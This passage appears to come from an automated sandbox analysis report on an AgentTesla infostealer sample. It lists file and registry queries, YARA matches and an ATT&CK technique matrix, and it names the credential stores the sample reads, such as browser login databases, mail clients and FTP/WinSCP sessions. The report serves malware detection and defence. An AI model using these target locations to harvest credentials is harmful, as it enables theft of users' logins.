                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0000000B.00000002.591209742.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe PID: 6704, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe PID: 5072, type: MEMORYSTR
                    Source: Yara matchFile source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.3956580.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.398a9a0.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.3920360.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.398a9a0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.3956580.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.385148858.0000000003920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000000.380187525.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000000.380767912.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000000.379680707.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.588935201.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000000.379081900.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.591209742.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe PID: 6704, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe PID: 5072, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: Yara matchFile source: 0000000B.00000002.591209742.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe PID: 5072, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0000000B.00000002.591209742.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe PID: 6704, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe PID: 5072, type: MEMORYSTR
                    Source: Yara matchFile source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.3956580.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.398a9a0.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.3920360.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.398a9a0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.3956580.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.385148858.0000000003920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000000.380187525.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000000.380767912.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000000.379680707.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.588935201.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000000.379081900.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.591209742.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe PID: 6704, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe PID: 5072, type: MEMORYSTR
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts211
                    Windows Management Instrumentation
                    1
                    Scheduled Task/Job
                    111
                    Process Injection
                    11
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services11
                    Archive Collected Data
                    Exfiltration Over Other Network Medium1
                    Web Service
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Scheduled Task/Job
                    Boot or Logon Initialization Scripts1
                    Scheduled Task/Job
                    1
                    Deobfuscate/Decode Files or Information
                    111
                    Input Capture
                    114
                    System Information Discovery
                    Remote Desktop Protocol2
                    Data from Local System
                    Exfiltration Over Bluetooth11
                    Encrypted Channel
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
                    Obfuscated Files or Information
                    1
                    Credentials in Registry
                    311
                    Security Software Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    Automated Exfiltration2
                    Non-Application Layer Protocol
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)13
                    Software Packing
                    NTDS1
                    Process Discovery
                    Distributed Component Object Model111
                    Input Capture
                    Scheduled Transfer3
                    Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Timestomp
                    LSA Secrets131
                    Virtualization/Sandbox Evasion
                    SSH1
                    Clipboard Data
                    Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    Masquerading
                    Cached Domain Credentials1
                    Application Window Discovery
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items131
                    Virtualization/Sandbox Evasion
                    DCSync1
                    Remote System Discovery
                    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job111
                    Process Injection
                    Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 620054 Sample: SecuriteInfo.com.Trojan.MSI... Startdate: 04/05/2022 Architecture: WINDOWS Score: 100 35 Found malware configuration 2->35 37 Malicious sample detected (through community Yara rule) 2->37 39 Multi AV Scanner detection for dropped file 2->39 41 10 other signatures 2->41 7 SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe 7 2->7         started        process3 file4 25 C:\Users\user\AppData\Roaming\gfLnSNNH.exe, PE32 7->25 dropped 27 C:\Users\...\gfLnSNNH.exe:Zone.Identifier, ASCII 7->27 dropped 29 C:\Users\user\AppData\Local\...\tmp20B8.tmp, XML 7->29 dropped 31 SecuriteInfo.com.T...Q.MTB.11269.exe.log, ASCII 7->31 dropped 43 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->43 45 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 7->45 47 Uses schtasks.exe or at.exe to add and modify task schedules 7->47 49 2 other signatures 7->49 11 